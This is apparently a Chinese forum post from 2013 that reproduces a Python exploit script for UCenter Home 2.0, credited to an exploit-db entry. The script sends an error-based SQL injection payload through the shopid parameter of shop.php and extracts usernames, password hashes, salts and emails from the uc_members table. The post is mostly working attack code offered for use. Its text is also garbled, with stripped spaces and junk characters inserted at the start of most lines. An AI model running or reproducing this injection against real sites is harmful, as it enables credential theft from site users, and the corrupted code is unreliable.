#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
3 Y" ~) Y2 [$ F2 d7 O
; ]% [' y" k" ?' \3 t, W
3 J0 _: ^4 N) _, S+ y#!/usr/bin/env python
4 D) Q t% J+ d; W b5 A9 J( R1 ], H+ c
import sys
$ `" c% ^$ o- O2 z; p7 a4 mimport urllib2
- E; y; d& E8 p. P0 simport re . w) T2 S- D' M% `, \
- I Q+ c; N" f! Hdef info():
, p8 v$ G9 b2 |" L8 S/ H print 'From:http://www.exploit-db.com/exploits/14997/'
. {% P9 z/ v% t$ o) H% H print 'http://www.hake.cc/Web_loudong/' 4 U& M9 E1 R4 Z( [
print 'changed:qiaoy'
. ~6 s% v8 s2 P9 _3 p print 'exp:'
( \# {1 a$ @. L2 g8 k F print ' ./UCenter_Home_2.0.py site'
6 T7 V/ }2 e2 ^ 8 N* }$ _+ A3 B
def main():
) t$ i, o# }* r" \ if len(sys.argv) != 2:
; ]8 [# t2 G% Q, U6 l% y! X% j3 ~# o info()
0 C, z4 x. ~8 C7 } else:
( X$ \ e0 a6 V4 @ B. d/ a# j site = sys.argv[1] & F$ E0 W. v$ g! _# m
if site[0:7] == 'http://': + c# A. ]1 h, _5 E6 g( K
sitesite =site
/ ]# h& i+ n! Z8 c( e4 Q elif site[0:8] == 'https://':
4 g' A0 Y! O+ y+ w$ p+ _ sitesite = site 9 p) a5 o, T5 W' N
else: ' a# D p; _) l
site = 'http://'+site 8 L$ p5 y7 I4 Y3 d# _% J
try: 1 |1 A8 h/ \5 ] G# {; I4 c' {
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' & X8 X; r; u: X
Value = urllib2.urlopen(url).read()
3 S# r3 h2 I* ~, y* p+ h Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0] % V7 s D7 T( I7 A
hacked = Msg.split(':') 6 Q3 A. O' y' u9 ~% I4 U% w) k# @+ |
print 'Name: '+hacked[1] % {" R3 ^) E* ~8 K$ j/ y- t
print 'Passwd: '+hacked[2]
& ]2 z' Q1 L* J1 A4 n' f print 'salt: '+hacked[3]
* O# u- q0 ^$ Z9 @. }' E1 | print 'email: '+hacked[4] " w9 O. |& K, o1 R
except:
( @( G; r0 H5 M# q; m print 'Sorry,I can\'t work............'
6 J9 @- g' W: `3 C
: A% x$ h7 o8 Z' ~$ s) e, ~if __name__ == '__main__':
1 t0 K( K7 Z$ ~6 I5 w; @ main() |
发表于 2013-1-23 09:18:17
收藏
支持
反对